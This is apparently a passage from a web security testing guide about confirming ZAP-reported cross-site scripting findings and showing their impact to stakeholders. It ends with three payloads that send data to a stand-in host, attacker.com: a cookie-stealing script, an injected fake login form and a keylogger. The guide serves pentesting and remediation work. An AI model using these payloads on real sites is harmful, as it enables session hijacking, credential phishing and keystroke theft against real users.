Verifying and Demonstrating XSS Impact

Vulnerability verification prevents false positive reports that waste remediation efforts. When ZAP reports XSS, manually reproduce the finding using the exact payload and injection point. Confirm that JavaScript actually executes rather than just reflecting benignly. Use alert boxes for safe demonstration, avoiding payloads that might affect other users during testing.

Impact demonstration helps communicate XSS severity to stakeholders. Instead of simple alert boxes, craft payloads demonstrating real attacks. Show session hijacking by accessing document.cookie, demonstrate phishing by injecting fake login forms, or prove data access by reading page content. These demonstrations make abstract vulnerabilities concrete, motivating proper remediation.

<!-- Impact Demonstration Payloads -->

<!-- Session Hijacking -->
<script>
fetch('http://attacker.com/steal?cookie=' + document.cookie)
</script>

<!-- Fake Login Form -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
  <form action="http://attacker.com/phish">
    <h2>Session Expired - Please Login</h2>
    <input name="user" placeholder="Username">
    <input name="pass" type="password" placeholder="Password">
    <button>Login</button>
  </form>
</div>

<!-- Keylogger -->
<script>
document.addEventListener('keypress', function(e) {
  fetch('http://attacker.com/log?key=' + e.key);
});
</script>